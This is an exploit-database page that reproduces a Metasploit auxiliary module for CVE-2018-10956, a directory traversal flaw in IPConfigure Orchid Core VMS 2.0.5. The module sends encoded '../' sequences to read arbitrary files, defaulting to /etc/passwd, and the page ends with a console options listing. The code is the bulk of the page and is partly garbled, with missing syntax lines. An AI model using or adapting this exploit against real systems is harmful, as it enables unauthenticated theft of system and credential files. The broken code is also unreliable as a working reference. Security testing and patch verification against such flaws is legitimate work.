Exploits / Vulnerability Discovered : 2018-06-20 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Ipconfigure orchid vms 2.0.5 directory traversal / information disclosure (metasploit) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
'Name' => 'IPConfigure Orchid VMS <=2.0.5 Directory Traversal Information Disclosure',
'Description' => %q{
Orchid Core VMS is vulnerable to a directory traversal attack. This affects Linux and Windows operating systems. This allows a remote, unauthenticated attacker to send crafted GET requests to the application, which results in the ability to read arbitrary files outside of the applications web directory. This issue is further compounded as the Linux version of Orchid Core VMS application is running in context of a user in the sudoers group. As such, any file on the underlying system, for which the location is known, can be read.
This module was tested against 2.0.5. This has been fixed in 2.0.6.
'Author' => [ 'Sanjiv Kawa @kawabungah' ],
'License' => MSF_LICENSE,
'References' =>
[ 'CVE', '2018-10956' ],
[ 'URL', 'https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/' ],
[ 'URL', 'http://ipconfigure.com/products/orchid-archives' ]
'DisclosureDate' => 'May 7, 2018'))
OptString.new('TARGETURI', [true, 'The base path to Orchid VMS', '/']),
OptString.new('FILE', [ true, 'This is the file to download', '/etc/passwd']),
OptString.new('INPUTFILE', [ false, 'Specify a list of files to download']),
], self.class )
def run
path = normalize_uri(target_uri.path)
res = init_request(path)
if res && res.code == 200
file = Array.new
trigger = "%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F"
if datastore['INPUTFILE'].nil? || datastore['INPUTFILE'].empty?
file = [datastore['FILE']]
file = File.open([datastore['INPUTFILE']].join(', ').to_s).readlines
for i in 0 .. file.length - 1
path = normalize_uri(target_uri.path) + trigger + file[i]
res = init_request(path)
if res.code == 200
print_good("Obtained #{datastore['FILE']}")
puts res.body
puts ""
print_error("#{datastore['FILE']} does not exist")
puts res.body
puts ""
print_error("Web Server is Unresponsive")
msf auxiliary(scanner/http/orchid_core_vms_directory_traversal) > show options
Name Current Setting Required Description
---- --------------- -------- -----------
FILE /etc/passwd yes This is the file to download
INPUTFILE no Specify a list of files to downloads
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to Orchid VMS
VHOST no HTTP server virtual host
msf auxiliary(scanner/http/orchid_core_vms_directory_traversal) > run